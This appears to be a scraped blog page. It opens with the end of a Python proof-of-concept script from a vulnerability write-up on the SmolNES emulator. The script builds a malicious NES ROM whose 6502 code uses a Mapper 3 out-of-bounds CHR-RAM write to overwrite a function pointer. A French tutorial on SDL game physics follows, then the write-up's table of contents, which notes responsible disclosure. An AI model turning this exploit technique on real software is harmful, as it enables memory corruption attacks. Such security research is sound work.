INTRA_OFFSET  = HOOK_OFFSET % 4096  # = 2168 = 0x878

assert BANK_INDEX in [2, 4, 6], f"Bank {BANK_INDEX} not reachable with Mapper 3 (val%4*2)"
MAPPER_VAL = BANK_INDEX // 2        # val such that val%4*2 = BANK_INDEX => val = BANK_INDEX/2

# V = INTRA_OFFSET (using bank 0 to access via chr[0])
V = INTRA_OFFSET  # 0x878

V_HIGH = (V >> 8) & 0x3F            # high byte for $2006 (6 bits)
V_LOW  = V & 0xFF                   # low byte for $2006

TARGET_BYTES = TARGET_ADDR.to_bytes(8, 'little')

print(f"[*] render_hook offset from chrram: {HOOK_OFFSET} (0x{HOOK_OFFSET:04X})")
print(f"[*] Bank index: {BANK_INDEX} => mapper write val={MAPPER_VAL} to $8000")
print(f"[*] V = 0x{V:04X} => $2006 writes: 0x{V_HIGH:02X} then 0x{V_LOW:02X}")
print(f"[*] Target: 0x{TARGET_ADDR:016X}")
print(f"[*] Little-endian bytes: {TARGET_BYTES.hex()}")

# ---- 6502 code construction ----
code = bytearray()

def nop():
    return bytes([0xEA])

def lda_imm(val):
    return bytes([0xA9, val])

def sta_abs(addr):
    return bytes([0x8D, addr & 0xFF, addr >> 8])

def jmp_abs(addr):
    return bytes([0x4C, addr & 0xFF, addr >> 8])

# Step 1: Mapper 3, write to $8000 to set chr[0] = BANK_INDEX
code += lda_imm(MAPPER_VAL)
code += sta_abs(0x8000)

# Step 2: set V via two consecutive writes to $2006
code += lda_imm(V_HIGH)
code += sta_abs(0x2006)
code += lda_imm(V_LOW)
code += sta_abs(0x2006)

# Step 3: write the 8 bytes of TARGET_ADDR via $2007
# get_chr_byte(V) => &chrram[HOOK_OFFSET] = &render_hook
# V auto-increments by 1 after each access => consecutive writes
for byte in TARGET_BYTES:
    code += lda_imm(byte)
    code += sta_abs(0x2007)

# Infinite loop (NOP + JMP) to let the PPU advance to scany==241
nop_offset = len(code)
code += nop()                            # NOP
code += jmp_abs(0x8000 + nop_offset)     # JMP back to NOP

print(f"[*] Code size: {len(code)} bytes (starts at $8000)")
print(f"[*] NOP loop at $8000+{nop_offset} = $" + f"{0x8000+nop_offset:04X}")

# ---- iNES ROM construction ----
PRG_SIZE = 16384  # 1 PRG bank = 16 KB

# iNES header (16 bytes)
header = bytearray(16)
header[0:4] = b'NES\x1a'
header[4] = 1         # 1 PRG bank (16 KB)
header[5] = 0         # 0 CHR banks => CHR-RAM mode
header[6] = 0x30      # Mapper 3 (high nibble = 3), horizontal mirroring
# bytes 7-15 = 0x00

# PRG ROM: filled with NOPs (0xEA), code at the start, reset vector at the end
prg = bytearray(nop() * PRG_SIZE)

# Code at offset 0 ($8000)
prg[0:len(code)] = code

# Reset vector at $FFFC-$FFFD (offset 0x3FFC in PRG): points to $8000
prg[PRG_SIZE-4] = 0x00   # low byte of $8000
prg[PRG_SIZE-3] = 0x80   # high byte of $8000

rom = bytes(header) + bytes(prg)

output_path = "poc_deadbeef.nes"
with open(output_path, "wb") as f:
    f.write(rom)

print(f"\n[+] ROM written: {output_path} ({len(rom)} bytes)")
print(f"[+] Run: ./smolnes/deobfuscated {output_path}")
print(f"[+] Expected: SIGSEGV / call to 0x{TARGET_ADDR:X} after ~1 PPU frame")

References

NESDev Wiki: the definitive resource for NES technical details
NesHacker playlist: excellent explanations of NES internals

Créer un système de physique avec SDL

Dec 28, 2024

Cet article s’attarde sur la création de comportements liés à la physique (gravité, collisions, rebonds) dans le contexte du développement de DuckDuckGame. Elle ne couvre pas la représentation des objets dans l’espace, mais uniquement la physique appliquée à ces objets.

La gravité

Pour créer de la gravité, c’est très simple, il suffit qu’à un intervalle régulier de temps (chaque image), la vitesse verticale d’un objet augmente. Pour cela il suffit d’avoir une variable représentant cette vitesse, puis d’y ajouter une valeur définie tel que dans le code suivant :

speed += 0.2;
personnage->rect->y += speed;

Et voila ! Notre personnage tombe.
Il faut noter que cette approche dépend du nombre de fois que cette fonction est exécutée par seconde. Le plus, le plus vite sera la chute. Pour palier à cela il nous faudrait une variable contenant le temps depuis la dernière image (connu sous le nom de DeltaTime), et multiplier notre augmentation de vitesse par celle-ci (afin que si le nombre d’image par seconde est élevé, la distance parcouru soit petite, et inversement).
Cependant obtenir un tel nombre a ses propres défis techniques, et c’est pour cela que dans la suite de ce document nous assumerons que le nombre d’image par seconde est fixe.

Les collisions

Le premier code permettant de gérer des collisions était celui-ci :

speed += 0.2;
if (personnage->rect->y >= 500) {
    personnage->rect->y = 500;
    speed = 0;
}
personnage->rect->y += speed;
render(personnage);

Il se basait sur une variable speed (qui représentait la vitesse verticale) qui était ajoutée au personnage à chaque frame, le faisant ainsi tomber en accélérant.
En guise de sol, nous avions les coordonnées Y=500 auquel le personnage était ramené s’il les dépassait.

À noter que rect->y représente le bord supérieur du personnage : à y=500 son sommet est à 500, son bas à 500+h, donc légèrement dans le sol. La position correcte serait personnage->rect->y = 500 - personnage->rect->h, mais cela ne change pas la démonstration du principe.

Cependant cette méthode amenait un léger problème :
Quand le personnage tombe de haut, sa vitesse faisait qu’il dépassait visiblement la barrière des 500, et était ramené à l’image d’après, donnant un effet de rollback.

Anticipation de la prochaine position

La correction à ceci a été d’anticiper la prochaine position du personnage à l’image d’après pour le placer directement à la bonne position (nous aurions pu vérifier de nouveau la position Y du personnage avant de le render, mais cela revient un peu au même). Ce concept d’anticipation de la prochaine position sera un fondement dans la suite du développement de ce système de collision.

Voici le code implémentant cette idée :

speed += 0.2;
if (personnage->rect->y + speed >= 500) {
    personnage->rect->y = 500;
    speed = 0;
}
personnage->rect->y += speed;
render(personnage);

(Le ”+ speed” après la position Y du perso, dans le if, modification discrète mais très efficace)

A partir de là, nous pouvons améliorer la structure d’un objet de manière à ce qu’elle puisse stocker les valeurs de vitesse X et Y de l’objet.
Et nous créerons une fonction (GetNextPosition) utilisant cela afin de retourner le Rect de la prochaine position de notre objet.

Collisions objet à objet

Maintenant, la prochaine étape sera d’améliorer ce avec quoi notre joueur a une collision. Pour l’instant nous utilisons simplement une hauteur prédéfinie dans le code, alors essayons d’utiliser un autre objet du jeu !

Nous attaquons donc les collisions “Objet - Objet” :
Pour savoir si un objet est en collision avec un autre, nous devons savoir s’ils se chevauchent, en d’autres termes, s’il y a une intersection entre eux.
Comme nous n’utilisons uniquement des rectangles pour l’instant, nous pouvons utiliser de manière très pratique la fonction SDL nommée “SDL_IntersectRect”, qui permet de savoir s’il y a une intersection entre deux Rect, et si oui d’avoir le rectangle représentant cette intersection comme montré dans le schéma suivant :

Dans notre cas, nous aurons un personnage, qui intersectionne avec un rectangle qui représente le sol, comme suit :

Nous constatons donc la collision entre ces deux objets, et la fonction SDL_IntersectRect nous retournerait bien TRUE, de plus nous récupèrerions aussi l’équivalent du rectangle bleu ici, qui représente l’intersection de ces deux Rect.
Additionnellement, ce schéma ne représente pas l’utilisation de la simulation de prochaine position que nous avons créée plus tôt. Dans les faits, à un état de repos le personnage serait situé sur le sol, et gagnerait à chaque frame de la vélocité verticale (due à la gravité). Cela déplacerait sa boite de prochaine position dans le sol, permettant ainsi de détecter la collision, et annulerait la vitesse verticale gagnée -> faisant donc effectivement rester le personnage immobile sur le sol, l’empêchant de le traverser.

Dans notre code, tout ce que nous aurons à faire c’est détecter avec la fonction SDL_IntersectRect s’il y a une collision entre la future position de notre personnage, et l’objet collisioné. Et si c’est le cas, déplacer le joueur au dessus de celui-ci :
personnage->y = obstacle->y - personnage->height
OU
personnage->y = personnageNextPos->y - IntersectRect->height

SDL_Rect* intersect = (SDL_Rect*) malloc(sizeof(SDL_Rect));
SDL_Rect* colliderNextPos = GetNextPos(collider); // GhostBox : projection de la position future du joueur
//N'oublions pas l'astuce d'utiliser la prochaine position de l'objet.

SDL_bool hasCollided = SDL_IntersectRect(colliderNextPos, collideePos, intersect);

if (hasCollided == SDL_TRUE) {
    collider->rect->y = collidee->rect->y - collider->rect->h;
}

free(intersect);

Maintenant, nous avons enfin un système permettant au personnage de tomber sur un objet, et d’y rester sans bouger !

Collisions multi-directionnelles

Cependant, nouveau problème :)
Le code présenté ci-dessus engendrerait des situations comme celle-ci :

Si notre joueur entre en collision depuis le côté avec ce qui représente le sol, il se fait téléporter au dessus de celui-ci.
Ce n’est de toute évidence absolument pas le comportement que nous désirons, nous devons donc adapter notre code afin qu’il puisse être plus généraliste.
L’objectif est de permettre de gérer proprement les collisions, qu’elles viennent aussi bien du côté, dessus ou dessous !

Mais pour commencer cantonnons nous à faire fonctionner les collisions pour 1 axe.
Notre code actuel fonctionne pour une collision sur 1 seul axe, ET en venant d’un seul côté de cet axe. En effet, si nous entrons en collision avec le sol que nous avons codé juste au dessus, nous nous faisons téléporter dessus ce dernier.

Pour commencer la résolution de ce problème, changeons d’abord d’axe. L’axe Y que nous utilisions jusqu’à présent était intuitif du point de vue de la gravité, cependant le fait que sa valeur augmente en descendant, ne l’est pas.
Prenons donc l’exemple d’un mur, et définissons les termes de l’explication :
Dans les exemples qui suivent, nous ferons référence à la prochaine position du joueur en tant que GhostBox, celle-ci est simplement une projection du joueur à partir de sa vélocité actuelle.

Très bien, grâce à ce que nous avons défini précédemment, cette collision serait résolue en plaçant le player juste collé au mur.

Voici le code complet implémentant les collisions de tous côtés, avec plusieurs objets simultanément :

WindowElement* collider = personnage;
SDL_Rect* colliderNextPos = GetNextPosition(collider); // GhostBox : projection de la position future du joueur

// Sachant que obs représente les objets du monde
for (unsigned i = 0; i < obs->lenght; ++i) {
    WindowElement* collidee = obs->objects + i; //mieux que &obs->objects[i]
    SDL_Rect* collideeNextPos = GetNextPosition(collidee);

    SDL_Rect* intersect = (SDL_Rect*) malloc(sizeof(SDL_Rect));
    SDL_bool hasCollided = SDL_IntersectRect(colliderNextPos, collideeNextPos, intersect);

    if (hasCollided == SDL_TRUE) {

        // À chacun de ces `if`, on vérifie la position du collider par rapport au collidee en utilisant leur position actuelle,
        // donc PAS leur future position. Mais tout en sachant que leur prochaine position est bien entrée en collision
        // Ici par exemple on sait qu'il VA y avoir collision, et on regarde si la collision vient du haut
        if (collider->rect->y + collider->rect->h <= collidee->rect->y)
        {
            collider->vY = 0;
            colliderNextPos->y -= intersect->h;
        }
        else if (collider->rect->y >= collidee->rect->y + collidee->rect->h) // collision vient du bas
        {
            collider->vY = 0;
            colliderNextPos->y += intersect->h;
        }

        if (collider->rect->x + collider->rect->w <= collidee->rect->x) // collision vient de gauche
        {
            collider->vX = 0;
            colliderNextPos->x -= intersect->w;
        }
        else if (collider->rect->x >= collidee->rect->x + collidee->rect->w) // collision vient de droite
        {
            collider->vX = 0;
            colliderNextPos->x += intersect->w;
        }
    }

    free(intersect);

    collidee->rect->x = collideeNextPos->x;
    collidee->rect->y = collideeNextPos->y;
}
// Maintenant que nous avons crafté une prochaine position cohérente, nous l'appliquons
collider->rect->x = colliderNextPos->x;
collider->rect->y = colliderNextPos->y;

Ordre de résolution des collisions

Cette implémentation a une subtilité : les collisions sont résolues dans l’ordre du tableau obs->objects. Dans DuckDuckGame, deux sols se téléportent en boucle pour simuler un défilement infini, et le joueur peut se retrouver simultanément en collision avec les deux à leur jonction.

Si A est résolu en premier, seule une collision verticale est détectée, elle est résolue correctement et B ne pose plus problème. En revanche si B est résolu en premier, la GhostBox déborde à la fois sur Y et sur X : les deux résolutions sont mutuellement exclusives. Notre code vérifiant Y avant X, le comportement dépend de laquelle des deux conditions est satisfaite, et au niveau d’une jonction, le joueur glissant horizontalement peut déclencher la collision X en premier, le faisant bloquer comme contre un mur invisible.

À noter que résoudre X avant Y ne réglerait pas le problème au niveau moteur : cela inverserait simplement le cas problématique. Deux murs superposés verticalement formeraient alors une plateforme invisible.

Plusieurs approches ont été envisagées pour déterminer l’ordre de résolution :

Distance naïve (centre à centre) : trier par distance entre le centre du joueur et le centre de chaque objet. Rejeté : si A et B ont des tailles radicalement différentes, la distance est biaisée par la taille et non par la proximité réelle.
Surface d’intersection : résoudre en priorité l’objet avec la plus grande surface de collision. Rend le problème moins probable mais ne le supprime pas.
Double calcul : calculer les deux résolutions possibles et retenir la plus éloignée. Coûteux et probablement soumis à des edge cases.
Projeté orthogonal : pour chaque objet, projeter orthogonalement le centre du joueur sur l’objet pour obtenir le point le plus proche lui appartenant, puis trier par cette distance. Règle le biais de taille tout en restant simple.

Dans la pratique, le problème était imperceptible dans le jeu final, donc cette approche est restée au stade de la réflexion.

Tentative : collisions continues

Cette approche est parfaitement fonctionnelle pour une utilisation classique, cependant elle a certaines limites dans des cas extrêmes. Imaginons que le Player aille à une vitesse très élevée, il serait possible que sa “GhostBox” passe directement derrière l’obstacle et par conséquent que le joueur le traverse. Voici un schéma illustrant ceci :

Nous pouvons essayer d’implémenter une solution avec SDL_UnionRect permettant de récupérer le rectangle contenant le joueur jusqu’à sa GhostBox (position future).

La seule différence par rapport au code précédent est la détection : au lieu d’utiliser directement la GhostBox, on construit une deltaBox couvrant le joueur de sa position actuelle jusqu’à sa GhostBox, puis on vérifie l’intersection avec celle-ci. La résolution reste identique.

SDL_FRect* deltaBox = (SDL_FRect*) malloc(sizeof(SDL_FRect));
SDL_UnionFRect(collider->rect, colliderNextPos, deltaBox);
SDL_bool hasCollided = SDL_HasIntersectionF(deltaBox, collideeNextPos);
free(deltaBox);

Après avoir testé cette méthode je vois un problème et en théorise un autre.
Le problème que je constate est que si le personnage est sur une plateforme qui monte, il ne peut plus sauter. Après investigation cela est dû au fait que dans ce code la boite d’union comprend la position actuelle du personnage et n’est pas basé uniquement sur ses positions futures. Cela a pour effet de créer une collision alors que dans le futur il n’y en aurait pas eu.
Ce problème peut être mitigé en enlevant la largeur et hauteur du Rect du perso à cette box et en la décalant dans la bonne direction.
Cependant ce problème m’a fait penser à un autre, ce système de boite d’union est présent pour avoir des collisions continues même si l’objet va à une haute vitesse. Cependant si l’objet va en diagonale la boite va s’étendre dans les deux directions diagonales tangentes et potentiellement entrer en collision avec un mur alors que l’objet serait simplement passé à côté avec un calcul normal. Pour régler cela il faudrait utiliser des raycasts afin de vérifier si une intersection LINEAIRE existe. Voir le schéma suivant :

Le système initial étant déjà suffisant pour ce que nous faisons, et n’ayant pas un temps illimité pour expérimenter, nous allons revenir à la version précédente du système de collision qui fait déjà suffisamment l’affaire. Cependant nous savons que si nous nécessitons éventuellement d’une version plus robuste, nous avons le modèle ici.

Le rebond

Implémenter un système de rebond une fois les bases physiques posées est plutôt simple.
Il nous suffit de définir un coefficient de rebond pour les objets du jeu, et de multiplier la vitesse du joueur sur l’axe de la collision par le négatif de ce coefficient ; inversant ainsi sa direction d’un facteur défini.
Exemple :
Le joueur avance de 5 vers la droite (mouvement sur X), il rencontre un obstacle avec un coefficient de rebond de 1.
Nous avons donc vitesse_joueur * -(coeff_rebond) = new_vitesse_joueur,
donc ici 5 * -1 = -5, notre joueur ira donc dans l’autre sens sans perte de vitesse, soit le comportement attendu.

Voici ce que cela donne en code :

// ...
// Si collision :

// Coefficient de rebond :
// 0 -> Aucun rebond
// 1 -> Rebond total, aucune perte de momentum
float bounciness = 1;

// Si collision sur axe Y, venant du dessus
if (collider->rect->y + collider->rect->h <= collidee->rect->y)
{
    // Négation de la vitesse Y et multiplication par le coefficient de rebond
    collider->vY *= -bounciness;

    // Gestion de la collision
}
// Gestion de l'axe Y venant du dessous et axe X similaire
// ...

À noter que cette formule suppose que le collidee est statique, ou du moins qu’il ne réagit pas à la collision (il pourrait par exemple être en mouvement linéaire, comme une plateforme qui se déplace). Dans le cas où les deux objets sont en mouvement et réagissent l’un à l’autre, il faudrait introduire la notion de masse et appliquer la conservation de la quantité de mouvement pour calculer les nouvelles vélocités des deux objets.

C

Vulnerability Research on SmolNES

Executive summary

Table of contents

1. Background and target selection

Why SmolNES?

2. Setting up the fuzzing environment

Preparing the binary

Compiling with AFL++

Seed corpus

Initial run

3. First results: initial crashes

4. Lead 1: OOB Read in PRG-ROM (abandoned)

5. Source code analysis

Overview of deobfuscated.c

Initialization: header parsing

The get_chr_byte() function

The central mem() function

6. Fuzzing iterations and optimizations

Iteration 1: SDL removal + cycle cap (result: 3 crashes, then stall)

Iteration 2: header patches + ASAN + 6502 dictionary

7. Discovering the real vulnerability: OOB Write via Mapper 3 CHR-RAM

The ASAN crash

Root cause: get_chr_byte() without bounds checking

Trigger conditions

Write address control

Demonstration: minimal 6502 assembly

8. Memory mapping and exploitation attempt

.bss section layout

The GOT is out of reach

The heap is out of reach

Analysis of variables within range

Impact assessment

9. PoC on modified binary: RIP control

Code modification

Malicious ROM

Result

Toward a full exploit

10. Responsible Disclosure and CVE

Reporting to the maintainer

Why no CVE was requested

11. Appendix: Required NES concepts

A. NES general architecture

B. The 6502 CPU and its address space

C. The PPU and VRAM

Registers $2006 (PPUADDR) and $2007 (PPUDATA)

D. Mappers

E. CHR-ROM vs CHR-RAM

F. Mapper 3 (CNROM)

G. The iNES file format

12. Resources

PoC script for modified binary

References

La gravité

Les collisions

Anticipation de la prochaine position

Collisions objet à objet

Collisions multi-directionnelles

Ordre de résolution des collisions

Tentative : collisions continues

Le rebond

The `get_chr_byte()` function

The central `mem()` function

Root cause: `get_chr_byte()` without bounds checking